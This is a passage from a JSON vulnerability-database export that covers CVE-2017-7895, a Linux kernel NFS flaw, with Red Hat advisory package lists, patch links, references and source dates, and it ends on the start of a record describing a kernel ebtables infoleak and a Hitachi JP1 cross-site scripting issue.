pc64le.rpm\nkernel-headers-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-514.26.1.el7.ppc64le.rpm\nperf-3.10.0-514.26.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\npython-perf-3.10.0-514.26.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-514.26.1.el7.s390x.rpm\nkernel-debug-3.10.0-514.26.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-514.26.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-514.26.1.el7.s390x.rpm\nkernel-devel-3.10.0-514.26.1.el7.s390x.rpm\nkernel-headers-3.10.0-514.26.1.el7.s390x.rpm\nkernel-kdump-3.10.0-514.26.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-514.26.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-514.26.1.el7.s390x.rpm\nperf-3.10.0-514.26.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.s390x.rpm\npython-perf-3.10.0-514.26.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-devel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-headers-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-514.26.1.el7.x86_64.rpm\nperf-3.10.0-514.26.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nkernel-doc-3.10.0-514.26.1.el7.noarch.rpm\n\nppc64:\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-514.26.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-514.26.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-514.26.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-514.26.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-514.26.1.el7.noarch.rpm\nkernel-doc-3.10.0-514.26.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-devel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-headers-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-514.26.1.el7.x86_64.rpm\nperf-3.10.0-514.26.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-514.26.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-2583\nhttps://access.redhat.com/security/cve/CVE-2017-6214\nhttps://access.redhat.com/security/cve/CVE-2017-7477\nhttps://access.redhat.com/security/cve/CVE-2017-7645\nhttps://access.redhat.com/security/cve/CVE-2017-7895\nhttps://access.redhat.com/security/updates/classification/#important\n\nhttps://access.redhat.com/articles/3090941. \n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2017 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFZU/jWXlSAg2UNWIIRAr2tAKCNLfAoYb4N6aC4Ku6JOiP/yO9YVQCgoj0+\nEY56W3xvQDrvUk2IIHHZzi4=\n=ObbT\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-7895"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      },
      {
        "db": "BID",
        "id": "98085"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-7895"
      },
      {
        "db": "PACKETSTORM",
        "id": "143172"
      },
      {
        "db": "PACKETSTORM",
        "id": "143388"
      },
      {
        "db": "PACKETSTORM",
        "id": "144142"
      },
      {
        "db": "PACKETSTORM",
        "id": "142829"
      },
      {
        "db": "PACKETSTORM",
        "id": "143173"
      },
      {
        "db": "PACKETSTORM",
        "id": "143417"
      },
      {
        "db": "PACKETSTORM",
        "id": "143171"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-7895",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "98085",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674",
        "trust": 0.8
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-7895",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143172",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143388",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "144142",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "142829",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143173",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143417",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143171",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-7895"
      },
      {
        "db": "BID",
        "id": "98085"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      },
      {
        "db": "PACKETSTORM",
        "id": "143172"
      },
      {
        "db": "PACKETSTORM",
        "id": "143388"
      },
      {
        "db": "PACKETSTORM",
        "id": "144142"
      },
      {
        "db": "PACKETSTORM",
        "id": "142829"
      },
      {
        "db": "PACKETSTORM",
        "id": "143173"
      },
      {
        "db": "PACKETSTORM",
        "id": "143417"
      },
      {
        "db": "PACKETSTORM",
        "id": "143171"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-7895"
      }
    ]
  },
  "id": "VAR-201704-1397",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.3152174
  },
  "last_update_date": "2024-07-23T20:18:09.167000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "nfsd: stricter decoding of write-like NFSv2/v3 ops",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/13bf9fbff0e5e099e2b6f003a0ab8ae145436309"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "nfsd: stricter decoding of write-like NFSv2/v3 ops",
        "trust": 0.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=13bf9fbff0e5e099e2b6f003a0ab8ae145436309"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171798 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171723 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171766 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171715 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20172732 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171647 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171615 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171616 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2017-7895",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2017-7895"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-raspi2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3359-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-raspi2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3314-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3360-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3312-2"
      },
      {
        "title": "Debian Security Advisories: DSA-3886-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=5aa274dd83de7f35a4264c0140f4a81c"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-gke, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3312-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3360-2"
      },
      {
        "title": "Ubuntu Security Notice: linux-hwe vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3361-1"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=549dc795290b298746065b62b4bb7928"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=d78b3379ca364568964f30138964c7e7"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - April 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=bf8deceb640f4a0fee008855afe6aa85"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-7895"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-189",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-7895"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7895"
      },
      {
        "trust": 1.4,
        "url": "https://github.com/torvalds/linux/commit/13bf9fbff0e5e099e2b6f003a0ab8ae145436309"
      },
      {
        "trust": 1.4,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=13bf9fbff0e5e099e2b6f003a0ab8ae145436309"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/bid/98085"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2017:2732"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2017:1798"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2017:1766"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2017:1647"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2017:1616"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2017:1615"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2017/dsa-3886"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2017:2472"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2017:2429"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2017:2428"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2017:2412"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2017:1723"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2017:1715"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7895"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2017-7895"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7645"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "https://support.f5.com/csp/article/k15004519"
      },
      {
        "trust": 0.3,
        "url": "https://www.oracle.com/technetwork/topics/security/linuxbulletinjul2017-3832368.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.oracle.com/technetwork/topics/security/ovmbulletinapr2017-3664626.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6214"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2017-7645"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2017-6214"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-7477"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-1000364"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-2583"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7477"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-2583"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000364"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/3359-1/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000251"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/cve-2017-1000251"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-1000251"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7472"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke/4.4.0-1014.14"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-2671"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-79.100"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1057.64"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1059.63"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9604"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7889"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7913"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7917"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9084"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1018.27"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-0605"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-2596"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9083"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6001"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7618"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8632"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3312-1"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3359-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-9605"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000380"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-8924"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-9150"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5551"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9755"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.8.0-59.64"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.8.0-1043.47"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5576"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-8925"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7346"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3090941."
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-7895"
      },
      {
        "db": "BID",
        "id": "98085"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      },
      {
        "db": "PACKETSTORM",
        "id": "143172"
      },
      {
        "db": "PACKETSTORM",
        "id": "143388"
      },
      {
        "db": "PACKETSTORM",
        "id": "144142"
      },
      {
        "db": "PACKETSTORM",
        "id": "142829"
      },
      {
        "db": "PACKETSTORM",
        "id": "143173"
      },
      {
        "db": "PACKETSTORM",
        "id": "143417"
      },
      {
        "db": "PACKETSTORM",
        "id": "143171"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-7895"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2017-7895"
      },
      {
        "db": "BID",
        "id": "98085"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      },
      {
        "db": "PACKETSTORM",
        "id": "143172"
      },
      {
        "db": "PACKETSTORM",
        "id": "143388"
      },
      {
        "db": "PACKETSTORM",
        "id": "144142"
      },
      {
        "db": "PACKETSTORM",
        "id": "142829"
      },
      {
        "db": "PACKETSTORM",
        "id": "143173"
      },
      {
        "db": "PACKETSTORM",
        "id": "143417"
      },
      {
        "db": "PACKETSTORM",
        "id": "143171"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-7895"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-04-28T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-7895"
      },
      {
        "date": "2017-04-28T00:00:00",
        "db": "BID",
        "id": "98085"
      },
      {
        "date": "2017-06-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      },
      {
        "date": "2017-06-28T20:11:00",
        "db": "PACKETSTORM",
        "id": "143172"
      },
      {
        "date": "2017-07-18T08:08:00",
        "db": "PACKETSTORM",
        "id": "143388"
      },
      {
        "date": "2017-09-14T19:52:43",
        "db": "PACKETSTORM",
        "id": "144142"
      },
      {
        "date": "2017-06-07T14:18:54",
        "db": "PACKETSTORM",
        "id": "142829"
      },
      {
        "date": "2017-06-28T20:10:00",
        "db": "PACKETSTORM",
        "id": "143173"
      },
      {
        "date": "2017-07-20T23:05:00",
        "db": "PACKETSTORM",
        "id": "143417"
      },
      {
        "date": "2017-06-28T20:12:00",
        "db": "PACKETSTORM",
        "id": "143171"
      },
      {
        "date": "2017-04-28T10:59:00.160000",
        "db": "NVD",
        "id": "CVE-2017-7895"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-7895"
      },
      {
        "date": "2019-02-14T04:00:00",
        "db": "BID",
        "id": "98085"
      },
      {
        "date": "2017-06-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      },
      {
        "date": "2023-01-19T16:13:02.183000",
        "db": "NVD",
        "id": "CVE-2017-7895"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "98085"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  NFSv2/NFSv3 Vulnerability that triggers pointer arithmetic errors in server implementation",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "98085"
      }
    ],
    "trust": 0.3
  }
}

var-201206-0028
Vulnerability from variot

The do_replace function in net/bridge/netfilter/ebtables.c in the Linux kernel before 2.6.39 does not ensure that a certain name field ends with a '\0' character, which allows local users to obtain potentially sensitive information from kernel stack memory by leveraging the CAP_NET_ADMIN capability to replace a table, and then reading a modprobe command line. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following products are affected: JP1/IT Resource Management - Manager JP1/IT Service Level Management - Manager.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:

Red Hat Enterprise Linux (v. 5 server) - i386, ia64, noarch, ppc, s390x, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, noarch, x86_64

  1. (CVE-2011-1093, Important)

